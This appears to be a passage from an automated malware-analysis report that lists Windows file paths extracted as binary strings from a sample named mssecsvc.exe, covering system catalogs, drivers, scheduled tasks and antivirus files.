              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr00a.cat
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\netserv.PNFTMP8p
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomeBasicEdition-wrapper~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\volsnap.PNFR07
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows~p
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\volmgrx.sys.muip
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\HdAudio.sysr
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856ad364e35~x86~~6.1.0.17514.catlum
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux-AuxComp~31bf3856ad364e35~x86~ru-RU~7.6.7600.320.cat
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_loc
              Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\AMDAGP.SYS.mui
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}t$p
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc005.catp
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\GAGP30KX.SYS.mui@p
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00d.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep002.catp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00c.catGQ
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Cookies
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\evbdx.sysskV
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\asyncmac.sys
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\iaStorV.sysr*
              Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockc
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgemc.log
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe5E
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ruIE
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\wbem\Logs856p
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\mshidkmdf.sysA
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sysD
              Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrSerWdm.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UltimateEdition~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\HdAudio.sysd
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exeAP7PDC
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB976902~31bf3856ad364e35~x86~~6.1.1.17514.catCp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catid4
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpdrv.log.2H
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\pots.dllp
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\Windows\System32\ru-RU\microsoft-windows-kernel-power-events.dll.mui
              Source: mssecsvc.exe.2.drBinary string: t\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.inim
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exeta
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat$0p
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\dot3svc.dllPN
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpdr.sysw
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\pnrpauto.dll
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\winusb.sysiv
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpscript.dll
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites3
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\qmgr.dll
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856ad364e35~x86~~6.1.0.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky007.catp
              Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\Prefetch\SVCHOST.EXE-007FEA55.pf
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Program Files\Common Files\AV\avast! Antivirus\userdata.cab0_TS
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00y.catp
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
              Source: mssecsvc.exe.2.drBinary string: |\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.iniop
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\lpremove.exep
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sys<\
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\gatherNetworkInfo.vbs1
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat\
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\djsvs.sysD
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\vmbus.sys
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume3\$RECYCLE.BIN\S-1-5-21-1870734524-1274666089-2119431859-1000H
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp002.catWp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr004.catH
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sys
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\ru-RU\rascfg.dll.mui
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Tuner-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\User Profile Service
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avgwsc.exep
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\isapnp.sys
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrUsbMdm.sys
              Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\umbus.sys.mui
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\IPMIDrv.sys
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\ru-RU\erofflps.txt
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpu320.sys
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CATo
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976902_RTM~31bf3856ad364e35~x86~~6.1.1.17514.cat
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\wersvc.dll
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Users\Public\Desktop\Google Chrome.lnk
              Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Windows\System32\drivers\Synth3dVsc.sys
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr004.catp
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\Defrag.exe
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\Prefetch\AVGUIRNX.EXE-006CD133.pfp
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\inf\netvwififlt.PNFF4
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\aliide.sys
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\werconcpl.dll
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\UAGP35.SYSt
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mstee.sysP
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catPROTp
              Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\PLA_S
              Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\NetTrace
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mstee.sys
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netnwifi.inf_loc
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr006.cat
              Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Program Files\Internet Explorer\ieproxy.dll
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sfloppy.sysH
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623\cef.pakp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnts002.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~en-US~8.0.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaDataI
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndisuio.inf_locp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00f.catCp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\AMDAGP.SYS.pdap
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\ProgramData\Avg\AV\DB\stats.db\/
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem9.CATpx
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exe
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrFiltUp.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Personalization-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\Performance\WinSAT\DataStore
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\SndVol.exep
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\ql40xx.sys\
              Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Remote Access Hostb
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catdp
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\WcsPlugInService.dll
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\TsUsbGD.sys$
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\sdrsvc.dll
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usbport.inf_loc
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~x86~~6.1.7601.17514.catHp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\UAGP35.SYS
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\NetworkAccessProtectionPM
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp003.catC
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Sidebar-Killbits-SDP-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catH
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky004.cat\
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: Z\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\lsi_fc.sysX
              Source: mssecsvc.exe.2.drBinary string: ~\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sysW
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\ql2300.sys
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrast.inf_loc'*
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avg-6ff9b621-270c-4f57-87d7-93687ce43d15.tmpp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat5E5p
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prngt003.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: s\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0R
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\consent.exe
              Source: mssecsvc.exe.2.drBinary string: R\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\PublishedData\RacWmiDatabase.sdf
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sffdisk.sys
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\System32\DXP.dllp
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\SoftwareDistribution\DataStore
              Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgns.log.lock
              Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\smb.sys
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mstee.sysfw\ZZ_
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cate
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem9.CATmp
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\aitagent.exe
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\ProgramData\Microsoft\RAC
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\RacEngn.dllPU
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avg-6ff9b621-270c-4f57-87d7-93687ce43d15.tmp$
              Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Media Center\Extender
              Source: mssecsvc.exe.2.drBinary string: b\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgns.logUSB4
              Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\System32\wfpip
              Source: mssecsvc.exe.2.drBinary string: ^\Device\HarddiskVolume2\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys2
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\inf\compositebus.PNFp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\lsi_fc.sys(
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\machine.PNF
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Registry
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.dirp
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netip6.inf_loc
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\StateData\RacMetaData.dat
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\mspqm.sysP5
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\vdrvroot.sys.mui
              Source: mssecsvc.exe.2.drBinary string: )\Device\HarddiskVolume2\Windows\Resources
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sys3
              Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\System32\appidcertstorecheck.exe
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\IPSECSVC.DLL
